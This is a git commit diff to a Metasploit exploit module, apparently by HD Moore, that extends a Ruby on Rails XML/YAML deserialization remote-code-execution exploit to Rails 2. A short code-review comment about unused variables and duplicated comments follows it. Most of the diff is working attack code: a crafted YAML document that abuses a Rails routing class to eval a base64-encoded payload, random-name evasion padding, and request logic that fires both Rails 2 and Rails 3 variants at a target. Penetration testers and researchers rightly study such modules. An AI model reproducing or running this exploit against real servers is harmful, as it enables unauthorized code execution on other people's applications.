Merge in Rails2 support now that its in master

bug/bundler_fix
HD Moore 2013-01-10 02:14:08 -06:00
parent bf013ba65f
commit 42ea64c21b
1 changed files with 34 additions and 9 deletions


@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
an attacker to instantiate a remote object, which in turn can be used to execute an attacker to instantiate a remote object, which in turn can be used to execute
any ruby code remotely in the context of the application. any ruby code remotely in the context of the application.
This module has been tested across multiple versions of RoR 3.x, but does not yet This module has been tested across multiple versions of RoR 3.x and RoR 2.x
work against 2.x versions of RoR.
}, },
'Author' => 'Author' =>
[ [
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Create the YAML document that will be embedded into the XML # Create the YAML document that will be embedded into the XML
# #
def build_yaml def build_yaml_rails2
# Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
"eval(%[#{code}].unpack(%[m0])[0]);' " +
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
yaml
end
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails3
# Embed the payload with the detached stub # Embed the payload with the detached stub
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Create the XML wrapper with any desired evasion # Create the XML wrapper with any desired evasion
# #
def build_request def build_request(v)
xml = '' xml = ''
elo = Rex::Text.rand_text_alpha(rand(12)+4) elo = Rex::Text.rand_text_alpha(rand(12)+4)
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
el = Rex::Text.rand_text_alpha(rand(12)+4) el = Rex::Text.rand_text_alpha(rand(12)+4)
xml << "<#{el} type='yaml'>" xml << "<#{el} type='yaml'>"
xml << build_yaml xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
xml << "</#{el}>" xml << "</#{el}>"
if datastore['XML::PadElement'] if datastore['XML::PadElement']
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
# Send the actual request # Send the actual request
# #
def exploit def exploit
data = build_request
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...") print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/", 'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'], 'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml', 'ctype' => 'application/xml',
'data' => data, 'data' => build_request(3)
}, 25)
handler
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => build_request(2)
}, 25) }, 25)
handler handler
end end
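Review bot: In the new `exploit` body `res` is assigned by both `send_request_cgi` calls but never read, so the first assignment is immediately clobbered and the second is dead; either drop the `res =` prefix on both calls (`send_request_cgi({`) or actually inspect the response before continuing. The two request blocks are identical apart from the `3`/`2` passed to `build_request`, which invites a drift bug when one of them is edited later. The signature change to `def build_request(v)` in the earlier hunk leaves `v` undocumented in the "Create the XML wrapper" header; a line such as `# v selects the YAML document: 2 -> build_yaml_rails2, 3 -> build_yaml_rails3` above it would make the dispatch on line `v == 2 ? build_yaml_rails2 : build_yaml_rails3` self-explanatory (build_request's body continues outside its hunk). Likewise the header comment added above `build_yaml_rails2` is a verbatim copy of the one above `build_yaml_rails3`, so neither says which Rails generation its document targets.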